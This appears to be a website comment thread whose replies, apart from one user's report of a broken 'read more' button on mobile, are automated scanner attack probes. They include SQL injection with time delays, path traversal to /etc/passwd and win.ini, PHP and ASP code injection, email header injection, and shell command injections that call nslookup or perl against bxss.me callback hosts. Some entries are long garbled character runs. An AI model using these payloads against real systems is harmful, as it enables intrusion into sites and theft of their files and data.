re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
'"
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
<!--
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
1
re: Just_Ingest
1
re: Just_Ingest
-1 OR 2+917-917-1=0+0+0+1 --
re: Just_Ingest
-1 OR 3+917-917-1=0+0+0+1 --
re: Just_Ingest
-1 OR 2+439-439-1=0+0+0+1
re: Just_Ingest
-1 OR 3+439-439-1=0+0+0+1
re: Just_Ingest
-1' OR 2+170-170-1=0+0+0+1 --
re: Just_Ingest
-1' OR 3+170-170-1=0+0+0+1 --
re: Just_Ingest
-1' OR 2+958-958-1=0+0+0+1 or 'FpExpPIi'='
re: Just_Ingest
-1' OR 3+958-958-1=0+0+0+1 or 'FpExpPIi'='
re: Just_Ingest
-1" OR 2+960-960-1=0+0+0+1 --
re: Just_Ingest
-1" OR 3+960-960-1=0+0+0+1 --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
5jY0ikyK'; waitfor delay '0:0:15' --
The read more button works when you access the site from computer, just not for mobile(android chrome). Have tried from chrome and edge.
re: Yee How
0QuITOAZ
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+643-643-1=0+0+0+1
re: Yee How
-1 OR 3+643-643-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
ltEQhohg'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 387=(SELECT 387 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: Yee How
ZSMbFH01' OR 731=(SELECT 731 FROM PG_SLEEP(15))--
re: Yee How
qsOCIxE8') OR 737=(SELECT 737 FROM PG_SLEEP(15))--
re: Yee How
LzD1TXUK')) OR 55=(SELECT 55 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@uxIQJ
re: Yee How
1EGIBbS3iO
re: Yee How
response.write(9480297*9187836)
re: Yee How
'+response.write(9480297*9187836)+'
re: Yee How
"+response.write(9480297*9187836)+"
re: Yee How
%0abcc:074625.67-22206.67.bf6fd.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
to@example.com>%0d%0abcc:074625.67-22207.67.bf6fd.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
echo segdcg$()\ lbxdes\nz^xyu||a #' &echo segdcg$()\ lbxdes\nz^xyu||a #|" &echo segdcg$()\ lbxdes\nz^xyu||a #
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
${9999693+9999588}
re: Yee How
&echo axbjzu$()\ fbyfse\nz^xyu||a #' &echo axbjzu$()\ fbyfse\nz^xyu||a #|" &echo axbjzu$()\ fbyfse\nz^xyu||a #
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
|echo nldger$()\ xouwnk\nz^xyu||a #' |echo nldger$()\ xouwnk\nz^xyu||a #|" |echo nldger$()\ xouwnk\nz^xyu||a #
re: Yee How
/etc/passwd
re: Yee How
(nslookup hitddmgwdloaj2ea50.bxss.me||perl -e "gethostbyname('hitddmgwdloaj2ea50.bxss.me')")
re: Yee How
%2fetc%2fpasswd
re: Yee How
$(nslookup hitfrwexzvctt9ad03.bxss.me||perl -e "gethostbyname('hitfrwexzvctt9ad03.bxss.me')")
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
&nslookup hithpgpjiiztzd6bf6.bxss.me&'\"`0&nslookup hithpgpjiiztzd6bf6.bxss.me&`'
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
&(nslookup hitqytewhvyrr91b24.bxss.me||perl -e "gethostbyname('hitqytewhvyrr91b24.bxss.me')")&'\"`0&(nslookup hitqytewhvyrr91b24.bxss.me||perl -e "gethostbyname('hitqytewhvyrr91b24.bxss.me')")&`'
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
|(nslookup hitwuetmhnqgd66eb8.bxss.me||perl -e "gethostbyname('hitwuetmhnqgd66eb8.bxss.me')")
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
)
re: Yee How
`(nslookup hitteqhwnlcht1cbea.bxss.me||perl -e "gethostbyname('hitteqhwnlcht1cbea.bxss.me')")`
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
!(()&&!|*|*|
re: Yee How
;(nslookup hitietvcnsafd1f8a6.bxss.me||perl -e "gethostbyname('hitietvcnsafd1f8a6.bxss.me')")|(nslookup hitietvcnsafd1f8a6.bxss.me||perl -e "gethostbyname('hitietvcnsafd1f8a6.bxss.me')")&(nslookup hitietvcnsafd1f8a6.bxss.me||perl -e "gethostbyname('hitietvcnsafd1f8a6.bxss.me')")
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
^(#$!@#$)(()))******
re: Yee How
file:///etc/passwd
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
/WEB-INF/web.xml
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
'.gethostbyname(lc('hitgs'.'wpdiagyd0b760.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(87).chr(97).chr(88).'
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
".gethostbyname(lc("hitgz"."opjieechf744c.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(67).chr(118).chr(73)."
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
/etc/shells
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
c:/windows/win.ini
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
bxss.me
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(102).concat(67).concat(117).concat(81)+(require"socket"
Socket.gethostbyname("hiteh"+"dyihfpqmdef3b.bxss.me.")[3].to_s)+"
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(98).concat(82).concat(113).concat(81)+(require'socket'
Socket.gethostbyname('hitet'+'bywsvmila5aa9.bxss.me.')[3].to_s)+'
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
WEB-INF/web.xml
re: Yee How
';print(md5(31337));$a='
re: Yee How
WEB-INF\web.xml
re: Yee How
";print(md5(31337));$a="
re: Yee How
${@print(md5(31337))}
re: Yee How
'"
re: Yee How
${@print(md5(31337))}\
re: Yee How
<!--
re: Yee How
'.print(md5(31337)).'
re: Yee How
1
re: Yee How
1
re: Yee How
-1 OR 2+10-10-1=0+0+0+1 --
re: Yee How
-1 OR 3+10-10-1=0+0+0+1 --
re: Yee How
-1 OR 2+866-866-1=0+0+0+1
re: Yee How
-1 OR 3+866-866-1=0+0+0+1
re: Yee How
-1' OR 2+82-82-1=0+0+0+1 --
re: Yee How
-1' OR 3+82-82-1=0+0+0+1 --
re: Yee How
-1' OR 2+559-559-1=0+0+0+1 or 'sgbj5Amj'='
re: Yee How
-1' OR 3+559-559-1=0+0+0+1 or 'sgbj5Amj'='
re: Yee How
-1" OR 2+288-288-1=0+0+0+1 --
re: Yee How
